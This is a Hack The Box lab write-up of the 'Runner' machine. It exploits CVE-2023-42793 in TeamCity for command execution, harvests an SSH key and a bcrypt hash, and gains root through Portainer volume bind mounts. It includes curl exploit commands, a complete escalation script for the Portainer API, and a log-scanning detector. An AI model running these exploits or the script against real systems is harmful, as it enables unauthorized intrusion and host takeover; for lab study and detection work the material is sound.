Dark_Man

HTB - Runner


Last updated 9 months ago

Enumeration


Scope

IP address: 10.10.11.13

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
* Open ports: 22 - 80 - 8000
* UDP open ports: none
* Services: ssh - http - http-alt (nmap's version probe labels 8000 as Nagios NSCA, but the http-title script got a text/plain HTTP response from it, so treat it as a second HTTP service)

CVE-2023-42793 (authentication bypass in JetBrains TeamCity on-premises, fixed in 2023.05.4, leading to unauthenticated RCE). The PoC uses it to create a new administrator account:

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb 
   
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]

Initial Access


The PoC only gives an admin account, not a shell. To get RCE I logged in as that account, generated an access token in the TeamCity web UI, and passed it as a Bearer token to the REST debug endpoint. If /app/rest/debug/processes returns an error, check that rest.debug.processes.enable=true is set in the data directory's config/internal.properties, which the public PoCs for this CVE enable.

Token

eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0

Get RCE

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"

StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
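Detection view of the chain above, as an added example that is not part of the original writeup or the PoC: a small scanner that runs over nginx combined-format access log lines and flags the requests characteristic of CVE-2023-42793 exploitation. The RPC2 token endpoint and the internal.properties edit are indicators from the public analysis of this CVE rather than from this page; the debug/processes and user-creation requests are the ones the writeup itself shows. The log lines are constructed.

```python
import re
from urllib.parse import unquote

# nginx/Apache "combined" access-log line, e.g. the nginx in front of TeamCity here
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against "METHOD <url-decoded path+query>".
INDICATORS = [
    # Auth bypass primitive: paths ending in /RPC2 skipped authentication, and the
    # public PoCs use it on the admin user's token endpoint (public CVE analysis,
    # not shown in the writeup itself).
    ("auth-bypass-rpc2-token", re.compile(r"/app/rest/users/id:\d+/tokens/RPC2")),
    # New account created via the REST API (the writeup's PoC adds an admin user).
    ("rest-user-create", re.compile(r"^POST /app/rest/users/?(\?|$)")),
    # Public PoCs write rest.debug.processes.enable=true via the data-dir editor.
    ("enable-debug-processes", re.compile(r"/admin/dataDir\.html\?.*fileName=config/internal\.properties")),
    # Command execution endpoint, exactly the request the writeup's curl sends.
    ("debug-processes-rce", re.compile(r"/app/rest/debug/processes\?.*exePath=")),
]

def parse_line(line):
    """Split a combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])   # %2F etc. must not hide the indicator
    return rec

def scan(lines):
    """Return one (ip, indicator, method, path, status) tuple per matched indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        request = f"{rec['method']} {rec['path']}"
        for name, rx in INDICATORS:
            if rx.search(request):
                hits.append((rec["ip"], name, rec["method"], rec["path"], rec["status"]))
    return hits

# Constructed sample log (not taken from the target); the IP is the attacker box
# seen in the netstat output later in the writeup.
SAMPLE_LOG = """\
10.10.16.31 - - [04/Jul/2024:06:10:01 +0000] "GET /login.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.16.31 - - [04/Jul/2024:06:10:05 +0000] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0 "-" "python-requests/2.31.0"
10.10.16.31 - - [04/Jul/2024:06:10:05 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 412 "-" "python-requests/2.31.0"
10.10.16.31 - - [04/Jul/2024:06:10:06 +0000] "POST /app/rest/users HTTP/1.1" 200 890 "-" "python-requests/2.31.0"
10.10.16.31 - - [04/Jul/2024:06:10:07 +0000] "POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable%3Dtrue HTTP/1.1" 200 0 "-" "python-requests/2.31.0"
10.10.16.31 - - [04/Jul/2024:06:29:29 +0000] "POST /app/rest/debug/processes?exePath=id HTTP/1.1" 200 57 "-" "curl/8.5.0"
"""

if __name__ == "__main__":
    for ip, name, method, path, status in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {name:<24} {method} {path} -> {status}")
```

Run it as a script to print the hits for the sample, or feed scan() real lines from /var/log/nginx/access.log. A hit on the RPC2 token path from an external address is the earliest signal, before any user is created; the URL-decoding matters because the PoCs send the fileName with %2F.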

Next I searched the container's filesystem for passwords, other sensitive data and private keys, and found an SSH private key stored in TeamCity's data directory (the trailing grep keeps only hits on line 1, i.e. files that start with a key header):


tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
-----END OPENSSH PRIVATE KEY-----
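Before trying the key against usernames, it is worth reading what the file says about itself. This is an added example (not the author's tooling) that parses the OpenSSH private key container format to report the key type, the SHA256 fingerprint that ssh-keygen -lf would print, whether a passphrase is needed, and the embedded comment, which often names the owner as user@host. The page's key is redacted, so the block builds a constructed, unencrypted ed25519 fixture with placeholder key bytes; the comment john@runner is invented for the demonstration.

```python
import base64
import hashlib
import struct

MAGIC = b"openssh-key-v1\x00"
# Number of key-type-specific fields between the key type and the comment in the
# private section (ed25519: pub, priv; rsa: n,e,d,iqmp,p,q; ecdsa: curve, pub, priv)
PRIVATE_FIELDS = {"ssh-ed25519": 2, "ssh-rsa": 6, "ecdsa-sha2-nistp256": 3,
                  "ecdsa-sha2-nistp384": 3, "ecdsa-sha2-nistp521": 3}

def _read_string(buf, off):
    # SSH wire "string": 4-byte big-endian length, then the bytes
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_openssh_private_key(text):
    """Key type, ssh-keygen-style SHA256 fingerprint, encryption flag and comment."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] != "-----BEGIN OPENSSH PRIVATE KEY-----" or lines[-1] != "-----END OPENSSH PRIVATE KEY-----":
        raise ValueError("not an OpenSSH-format private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    _kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    off += 4                                       # number of keys (always 1 in practice)
    pub_blob, off = _read_string(blob, off)        # public key is never encrypted
    key_type, _ = _read_string(pub_blob, 0)
    digest = hashlib.sha256(pub_blob).digest()
    info = {"type": key_type.decode(), "encrypted": cipher != b"none", "comment": None,
            "fingerprint": "SHA256:" + base64.b64encode(digest).decode().rstrip("=")}
    if info["encrypted"]:
        return info        # private section (and comment) needs the passphrase
    priv, _ = _read_string(blob, off)
    c1, c2 = struct.unpack_from(">II", priv, 0)
    if c1 != c2:
        raise ValueError("checkint mismatch: corrupt private section")
    p = 8
    _kt, p = _read_string(priv, p)
    nfields = PRIVATE_FIELDS.get(info["type"])
    if nfields is None:
        return info        # unknown type: keep type/fingerprint, skip the comment
    for _ in range(nfields):
        _, p = _read_string(priv, p)
    comment, _ = _read_string(priv, p)
    info["comment"] = comment.decode(errors="replace")
    return info

def owner_hint(info):
    """Local username suggested by a 'user@host' comment, or None."""
    c = info.get("comment") or ""
    return c.split("@", 1)[0] if "@" in c else None

def build_fixture_ed25519_key(comment):
    """Constructed, unencrypted ed25519 key in OpenSSH format. The key material is
    placeholder bytes (not a usable key pair); only the container format is real."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    pub = hashlib.sha256(comment.encode()).digest()           # 32 placeholder bytes
    priv_section = struct.pack(">II", 0xDEADBEEF, 0xDEADBEEF)  # matching checkints
    priv_section += s(b"ssh-ed25519") + s(pub) + s(pub + pub) + s(comment.encode())
    pad = 1
    while len(priv_section) % 8:                               # pad 1,2,3,... to block size
        priv_section += bytes([pad])
        pad += 1
    blob = (MAGIC + s(b"none") + s(b"none") + s(b"") + struct.pack(">I", 1)
            + s(s(b"ssh-ed25519") + s(pub)) + s(priv_section))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"

if __name__ == "__main__":
    info = parse_openssh_private_key(build_fixture_ed25519_key("john@runner"))
    print(info, "try user:", owner_hint(info))
```

An encrypted key (cipher other than none) hides the comment; the fingerprint is still available and the passphrase becomes a job for ssh2john and john. Compare the fingerprint against ~/.ssh/authorized_keys on the target, or the server's auth log, to confirm which account the key actually opens instead of spraying it.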

I'll try to log in over SSH with the private key as each of the existing users.

Success :)

john@runner:~$ cat user.txt 
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx


Privilege Escalation

john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.11.13:80          10.10.16.31:55852       ESTABLISHED -
tcp        0      0 127.0.0.1:8111          127.0.0.1:39674         TIME_WAIT   -       

I'll forward the internal-only ports to my box with SSH local port forwarding:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa

Port 9000 serves a web app:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT

Browsing to http://localhost:9000 brings up the Portainer login page.

I knew I had missed something, so I went back to the TeamCity web app: I had not yet taken a server backup and read its contents. The database dump in the backup contains the users table with bcrypt password hashes:

tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
Matthew's hash, bcrypt with cost factor 7 (the $07$ field), saved to a file named hash for cracking:

matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked

Log in to Portainer at http://localhost:9000 as matthew with the cracked password.

This article explains the container setup well, although it was written for an older version of Portainer:

Following the post:

Get the image id of an image that already exists on the host (Images view); the new container will be created from it.

Map the host filesystem into a volume using the local driver with these driver options (a bind mount of /):

device: /
o: bind
type: none

Create a container from that image with the volume mounted, then start it.

Finally, open the container's console from Portainer: the host's root filesystem sits under the mount point, so root's files are readable and a chroot into the mount gives a root shell on the host filesystem :)

Note that nothing here is a Portainer bug. Anyone who can create containers with arbitrary volumes, whether through Portainer or the Docker socket directly, is root on the host, so Portainer credentials are root credentials.

Root flag: e5072defc9d08b4320325b1e16a6b83f
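The same steps driven through Portainer's REST API instead of the UI, as an added example (not from the writeup or the linked article). Portainer proxies the Docker Engine API under /api/endpoints/<id>/docker, so the volume and container are created with ordinary Docker API bodies. Assumptions, also labelled in the code: Portainer is reached through the SSH forward on localhost:9000 as above, the local Docker environment has id 2, the names hostroot and the mount point /mnt are arbitrary, and the chosen image contains tail and cat.

```python
import json
import sys
import urllib.request

# Assumptions (not from the writeup): Portainer behind the SSH forward on
# localhost:9000; the local Docker environment has id 2 (check GET /api/endpoints).
PORTAINER = "http://localhost:9000"
ENDPOINT_ID = 2

def volume_spec(name="hostroot"):
    # Docker "local" volume driver with bind options: the volume *is* the host
    # root filesystem. These are the three settings entered in the Portainer UI.
    return {"Name": name, "Driver": "local",
            "DriverOpts": {"device": "/", "o": "bind", "type": "none"}}

def container_spec(image, volume="hostroot", mountpoint="/mnt"):
    # Keep the container alive with a TTY so a console/exec can attach later.
    return {"Image": image, "Cmd": ["tail", "-f", "/dev/null"], "Tty": True,
            "HostConfig": {"Binds": [f"{volume}:{mountpoint}"]}}

def docker_path(path, endpoint_id=ENDPOINT_ID):
    # Portainer proxies the Docker Engine API below /api/endpoints/<id>/docker
    return f"/api/endpoints/{endpoint_id}/docker{path}"

def call(method, path, body=None, token=None):
    """JSON request to Portainer; returns parsed JSON, or raw bytes for non-JSON bodies."""
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(PORTAINER + path, data=data, method=method, headers=headers)
    with urllib.request.urlopen(req) as resp:
        raw = resp.read()
        if resp.headers.get("Content-Type", "").startswith("application/json") and raw:
            return json.loads(raw)
        return raw

def escalate(user, password, image=None):
    """Log in, bind / into a volume, start a container on it, read a root-only file."""
    token = call("POST", "/api/auth", {"Username": user, "Password": password})["jwt"]
    if image is None:
        # "Get the image id": reuse any image already on the host, no pull needed
        image = call("GET", docker_path("/images/json"), token=token)[0]["Id"]
    call("POST", docker_path("/volumes/create"), volume_spec(), token)
    cid = call("POST", docker_path("/containers/create?name=hostroot"),
               container_spec(image), token)["Id"]
    call("POST", docker_path(f"/containers/{cid}/start"), token=token)
    # Equivalent of opening the console in Portainer: read through the mount.
    # An interactive "chroot /mnt /bin/bash" in that console is a root shell.
    ex = call("POST", docker_path(f"/containers/{cid}/exec"),
              {"AttachStdout": True, "AttachStderr": True, "Tty": True,
               "Cmd": ["cat", "/mnt/root/root.txt"]}, token)["Id"]
    out = call("POST", docker_path(f"/exec/{ex}/start"), {"Detach": False, "Tty": True}, token)
    return out.decode(errors="replace")

if __name__ == "__main__":
    print(escalate(sys.argv[1], sys.argv[2]))
```

python3 portainer_root.py matthew '<password>' prints the file read through the mount; the volume body carries the exact device/o/type triple from the UI steps. The exec is started with Tty set so Docker returns a plain byte stream rather than the multiplexed stdout/stderr framing, which is why the output can be decoded directly.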

GitHub - Zyad-Elsayed/CVE-2023-42793: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793
Use Portainer for Privilege Escalation (Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis)